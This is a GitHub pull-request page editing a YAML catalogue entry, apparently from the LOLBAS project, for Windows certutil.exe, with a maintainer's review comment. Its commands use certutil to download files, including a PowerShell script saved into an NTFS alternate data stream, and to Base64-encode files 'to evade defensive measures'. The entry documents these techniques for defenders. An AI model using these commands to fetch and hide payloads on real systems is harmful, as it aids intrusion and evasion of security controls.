Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update Certutil.yml with new flag and update previous flag #402

Open
wants to merge 5 commits into
base: master
Choose a base branch
from
Open

Update Certutil.yml with new flag and update previous flag #402

Changes from all commits
Commits
Show all changes
5 commits
Select commit Hold shift + click to select a range
97d9dc8
Update Certutil.yml with new flag and update previous flag
Snausage0x45 Oct 1, 2024
8421c87
fixed borked tabbing Certutil.yml
Snausage0x45 Oct 1, 2024
d4d55a5
Update Certutil.yml
Snausage0x45 Oct 1, 2024
1842b53
Update Certutil.yml
Snausage0x45 Oct 1, 2024
3a269ef
Add GUI tag
wietze Oct 1, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
19 changes: 16 additions & 3 deletions yml/OSBinaries/Certutil.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -4,27 +4,36 @@ Description: Windows binary used for handling certificates
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
- Command: certutil.exe -urlcache -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Description: Download and save 7zip to disk in the current folder.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
- Command: certutil.exe -verifyctl -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Copy link
Member

@wietze wietze Oct 1, 2024
edited
Loading

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

just checking, can we leave out -split here too? If not, is there a reason for changing the order of f and split?

Description: Download and save 7zip to disk in the current folder.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
- Command: certutil.exe -urlcache -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil.exe -URL http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Description: Download and save 7zip to disk in the current folder.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Application: GUI
- Command: certutil -encode inputFileName encodedOutputFileName
Description: Command to encode a file using Base64
Usecase: Encode files to evade defensive measures
Expand Down Expand Up @@ -75,3 +84,7 @@ Acknowledgement:
- Person: egre55
Handle: '@egre55'
- Person: Lior Adar
- Person: Adam
Handle: '@hexacorn'
- Person: SomeTestLeper
Handle: '@SomeTestLeper'
Loading